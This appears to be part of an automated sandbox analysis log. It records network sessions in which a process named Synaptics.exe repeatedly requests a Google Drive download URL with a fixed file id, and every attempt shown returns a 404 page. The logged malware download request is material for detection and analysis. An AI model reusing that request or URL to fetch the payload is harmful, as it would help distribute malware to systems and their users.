                                                                                                                                                                                  2022-05-27 02:38:22 UTC58INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 6f 54 6a 69 7a 63 4b 4f 42 47 52 47 77 45 37 67 69 49 5a 67 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GoTjizcKOBGRGwE7giIZgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:22 UTC59INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:22 UTC59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  19192.168.2.349763172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:22 UTC56OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:22 UTC59INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Jwo8YNn7apHNif3dNNwORg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:22 UTC60INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                  2022-05-27 02:38:22 UTC61INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 78 48 33 6e 36 71 73 64 65 56 78 48 78 69 71 45 46 76 67 31 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uxH3n6qsdeVxHxiqEFvg1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:22 UTC62INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:22 UTC62INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  2192.168.2.349741172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:17 UTC6OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:17 UTC6INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:17 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-9ATWUqWplyjaZX-8YRpg4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:17 UTC8INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 5a 56 52 47 45 53 42 74 69 30 2d 62 43 33 46 48 49 70 70 63 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WZVRGESBti0-bC3FHIppcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:17 UTC9INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:17 UTC9INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  20192.168.2.349764172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:22 UTC59OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:22 UTC62INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce--M3PXO3RAuR4BKAvWbYB7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:22 UTC64INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 6a 79 65 73 74 52 65 4b 44 55 48 6b 34 6d 62 4d 31 46 5a 6f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JjyestReKDUHk4mbM1FZow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:22 UTC65INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:22 UTC65INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  21192.168.2.349765172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:22 UTC65OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:23 UTC65INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-2Sq4Ic8OXa_tkloownQlKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:23 UTC67INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                  2022-05-27 02:38:23 UTC67INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 65 57 4d 6f 47 42 2d 2d 5f 4b 41 65 6f 70 55 33 33 62 6f 6a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LeWMoGB--_KAeopU33bojw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:23 UTC68INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:23 UTC68INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  22192.168.2.349766172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:22 UTC65OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:23 UTC68INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-cV3EiRkhzpvUmg1rEmBE6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:23 UTC70INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
